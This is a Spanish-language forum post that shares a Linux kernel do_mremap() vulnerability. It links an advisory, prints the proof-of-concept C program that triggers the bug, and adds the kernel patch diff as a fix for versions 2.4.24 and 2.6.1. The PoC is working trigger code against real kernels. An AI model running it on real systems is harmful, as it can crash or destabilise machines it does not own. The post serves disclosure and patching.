Aqui les dejo el Advisory y el Proof of concept Exploit, que significa esto ultimo, que solo es un exploit para checar si eres vulnerable o no, Osea no te da root. Esto es para los kiddies que no hagan de sus diabluras. : )
- Los parches ya salieron y estan en 2.4.24 , 2.6.1
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesionwww.kernel.org
- Tambien hay un HotFix que lo puse despues del exploit. : )
* Advisory - >
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesion * Proof of Concept Exploit
aqui abajo
AQUI comienza
/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define __NR_real_mremap __NR_mremap
static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );
int main( void )
{
void *base;
base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );
real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );
fork();
return( 0 );
}
AQUI TERMINA corte antes de esto.
Y aqui esta el hotfix par alos que no quieren recompilar kernel, ni parchar.
diff -Naur -X /home/marcelo/lib/dontdiff linux-2.4.23/mm/mremap.c
linux-2.4.24-rc1/mm/mremap.c
--- linux-2.4.23/mm/mremap.c 2003-08-25 11:44:44.000000000 +0000
+++ linux-2.4.24-rc1/mm/mremap.c 2004-01-04 20:52:19.000000000 +0000
@ @ -241,6 +241,13 @ @
if (new_len > TASK_SIZE || new_addr > TASK_SIZE - new_len)
goto out;
+ /*
+ * Allow new_len == 0 only if new_addr == addr
+ * to preserve truncation in place (that was working
+ * safe and some app may depend on it).
+ */
+ if (unlikely(!new_len && new_addr != addr))
+ goto out;
/* Check if the location we're moving into overlaps the
* old location at all, and fail if it does.
** ESPERO QUE les sirva
Saludos!
protoloco @vulnfact.com
Autor